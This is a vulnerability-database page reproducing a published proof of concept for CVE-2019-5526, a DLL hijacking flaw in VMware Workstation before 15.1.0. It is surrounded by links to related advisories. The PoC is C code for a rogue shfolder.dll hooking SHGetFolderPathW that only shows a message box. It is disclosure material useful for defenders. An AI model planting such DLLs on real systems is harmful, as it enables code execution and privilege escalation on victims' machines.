Lucene search
K

VMware Workstation 15.1.0 - DLL Hijacking Exploit

🗓️ 16 May 2019 00:00:00Reported by Miguel MendezType 
zdt
 zdt
🔗 0day.today👁 166 Views

VMware Workstation 15.1.0 - DLL Hijacking Exploit CVE-2019-552

Related
Code
ReporterTitlePublishedViews
Family
BDU FSTEC
The vulnerability of VMware Workstation’s virtualization platform, related to errors during DLL file loading, allows attackers to escalate their privileges.
4 Jul 201900:00
bdu_fstec
Circl
CVE-2019-5526
16 May 201900:00
circl
CVE
CVE-2019-5526
15 May 201915:18
cve
Cvelist
CVE-2019-5526
15 May 201915:18
cvelist
Exploit DB
VMware Workstation 15.1.0 - DLL Hijacking
16 May 201900:00
exploitdb
EUVD
EUVD-2019-15101
3 Oct 202520:07
euvd
exploitpack
VMware Workstation 15.1.0 - DLL Hijacking
16 May 201900:00
exploitpack
Kaspersky
KLA12116 PE vulnerability in VMware Workstation and Player
14 May 201900:00
kaspersky
NVD
CVE-2019-5526
15 May 201916:29
nvd
Packet Storm
VMware Workstation DLL Hijacking
16 May 201900:00
packetstorm
Rows per page
#---------------------------------------------------------
# Title: VMware Workstation DLL hijacking < 15.1.0
# Author: Miguel Mendez Z. & Claudio Cortes C.
# Team: www.exploiting.cl
# Vendor: https://www.vmware.com
# Version: VMware Workstation Pro / Player (Workstation)
# Tested on: Windows Windows 7_x86/7_x64 [eng]
# Cve: CVE-2019-5526
#---------------------------------------------------------


Description:

VMware Workstation contains a DLL hijacking issue because some DLL.


DLL Hijacking: shfolder.dll
Hooking: SHGetFolderPathW()

------Code_Poc-------
#include "dll.h"
#include <windows.h>

DLLIMPORT void SHGetFolderPathW()
{
MessageBox(0, "s1kr10s", "VMWare-Poc", MB_ICONINFORMATION);
exit(0);
}

--------------------------


https://www.vmware.com/security/advisories/VMSA-2019-0007.html

#  0day.today [2019-05-21]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 May 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
EPSS0.0683
166